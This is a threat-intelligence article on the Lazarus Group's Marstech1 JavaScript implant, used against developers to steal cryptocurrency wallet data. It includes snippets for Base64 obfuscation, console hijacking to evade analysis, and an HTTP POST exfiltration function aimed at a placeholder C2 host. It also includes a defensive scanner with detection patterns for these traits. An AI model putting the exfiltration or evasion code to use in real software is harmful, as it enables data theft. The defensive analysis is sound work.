The notorious Lazarus Group, in a recent escalation of cyber threats linked to North Korea, has unveiled a sophisticated new tactic to target developers worldwide.
This campaign, dubbed “Operation Marstech Mayhem,” involves the deployment of an advanced malware implant known as “Marstech1.”
The operation marks a significant evolution in the group’s supply chain attacks, leveraging novel obfuscation techniques and unconventional command-and-control (C2) infrastructure.
Marstech1 is a JavaScript-based implant designed to collect system details, including hostname, platform, and home directory, facilitating reconnaissance on target machines.
It employs advanced obfuscation methods such as control flow flattening, self-invoking functions, random variable and function names, Base64 string encoding, and anti-debugging checks.
Security researchers at SecurityScorecard noted that these techniques make the implant challenging to detect when it is embedded in legitimate software packages or websites.
```javascript
// Example of obfuscated JavaScript: a Base64-encoded string is decoded only at runtime,
// so the plaintext never appears in the file for simple string searches to find
var a = "aGVsbG8="; // constructed Base64 value for illustration; decodes to "hello"
var b = atob(a);    // decoding Base64
```
The C2 server operates on port 3000, utilizing Node.js Express on the backend, a departure from previous operations that used ports 1224 and 1245.
This setup is hosted by Stark Industries LLC and lacks the React web admin panel seen in earlier campaigns.
```bash
# Nmap scan example: check whether the non-standard C2 port is open on a host
nmap -p 3000 <target_IP>
```
SecurityScorecard's STRIKE team identified a GitHub profile, “SuccessFriend,” linked to the Lazarus Group. This profile has been active since July 2024 and includes both legitimate and malicious code repositories.
The profile’s focus on web development and blockchain aligns with the group’s interests.
SuccessFriend GitHub profile highlights:
- **Web Development Skills**
- **Blockchain Learning**
With the obfuscation techniques listed above in mind, the implant's core capabilities are as follows:
The Marstech1 implant is engineered to scan systems for cryptocurrency wallets like Exodus and Atomic on Linux, macOS, and Windows.
It extracts file contents and metadata, sending them to the C2 server via HTTP POST requests.
```javascript
// Example of a data exfiltration function: collected data is wrapped in a JSON
// payload and sent to the C2 server. C2_URL is a placeholder, not a real address.
async function exfiltrateData(data) {
  var payload = {
    data: data,
    timestamp: Date.now(),
    type: "marstech1"
  };
  // Send payload to C2 server as an HTTP POST request (global fetch, Node 18+)
  return fetch("https://C2_URL/uploads", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload)
  });
}
```
The malware employs advanced anti-analysis techniques to evade detection. It uses one-time execution wrappers to prevent repeated execution of critical functions, making it harder for security tools to analyze its behavior.
It also hijacks the console methods to obscure debug output, further complicating efforts to track and mitigate its activities.
```javascript
// Example of console hijacking: console.log is replaced so debug output is
// swallowed, depriving an analyst of easy runtime tracing
var originalConsoleLog = console.log; // the original is kept so the implant itself can still use it
console.log = function() {
  // Custom logging logic (here: discard everything)
};
```
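The traits described above (Base64 decoding, console hijacking, anti-debugging, random hex identifiers, system reconnaissance, wallet names and HTTP POST exfiltration) can be turned into a review-prioritisation heuristic for code pulled into a build. The following static scanner is an added example, not code from the article or from SecurityScorecard; its indicator patterns, weights, threshold and the two sample sources are this example's own assumptions.

```javascript
// Added example (not from the original article): a heuristic static scanner
// that flags Marstech1-style traits in JavaScript source text. The patterns
// and weights are this example's own assumptions; a hit means "worth a human
// look", not "malicious".
const INDICATORS = [
  { name: "base64-decode",   weight: 1, re: /\batob\s*\(|Buffer\.from\s*\([^)]*['"]base64['"]/ },
  { name: "console-hijack",  weight: 3, re: /\bconsole\.(log|error|warn|info|debug)\s*=/ },
  { name: "anti-debug",      weight: 2, re: /\bdebugger\b|Function\s*\(\s*['"]debugger['"]\s*\)/ },
  { name: "hex-identifiers", weight: 1, re: /\b_0x[0-9a-f]{4,}\b/i },
  { name: "system-recon",    weight: 2, re: /\bos\.(hostname|platform|homedir)\s*\(/ },
  { name: "wallet-names",    weight: 3, re: /\b(Exodus|Atomic)\b/ },
  { name: "http-post",       weight: 1, re: /\.post\s*\(|method\s*:\s*['"]POST['"]/i },
];

// Scan one file's source text; return the matched indicator names and a score.
function scanSource(src) {
  const matched = INDICATORS.filter(ind => ind.re.test(src));
  return {
    hits: matched.map(ind => ind.name),
    score: matched.reduce((sum, ind) => sum + ind.weight, 0),
  };
}

// Review threshold: several independent traits co-occurring is the signal,
// since any single one (a POST, a self-invoking bundle) is common in benign code.
function needsReview(result) {
  return result.score >= 5 && result.hits.length >= 3;
}

// Constructed sample resembling the traits described in the article (not real
// implant code): recon, wallet name, console hijack, Base64 decoding, POST.
const SUSPICIOUS = `
const os = require("os");
console.log = function() {};
const _0x4a2f = atob("aG9zdG5hbWU=");
const info = { host: os.hostname(), home: os.homedir(), wallets: ["Exodus"] };
fetch(C2, { method: "POST", body: JSON.stringify(info) });
`;

// Constructed benign sample: an ordinary module that merely logs.
const BENIGN = `
const os = require("os");
module.exports = function greet(name) { console.log("hi " + name); };
`;

for (const [label, src] of [["suspicious", SUSPICIOUS], ["benign", BENIGN]]) {
  const r = scanSource(src);
  console.log(label, r.hits.join(","), "score=" + r.score, needsReview(r) ? "REVIEW" : "ok");
}
```

In a CI pipeline the same function would run over every file of a newly added dependency, with flagged packages held for manual review rather than blocked outright.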
The use of advanced obfuscation techniques and novel C2 infrastructure poses significant challenges for detection and analysis.
As a result, it is crucial for organizations to adopt robust security measures, including continuous monitoring of supply chain activities and integration of advanced threat intelligence solutions.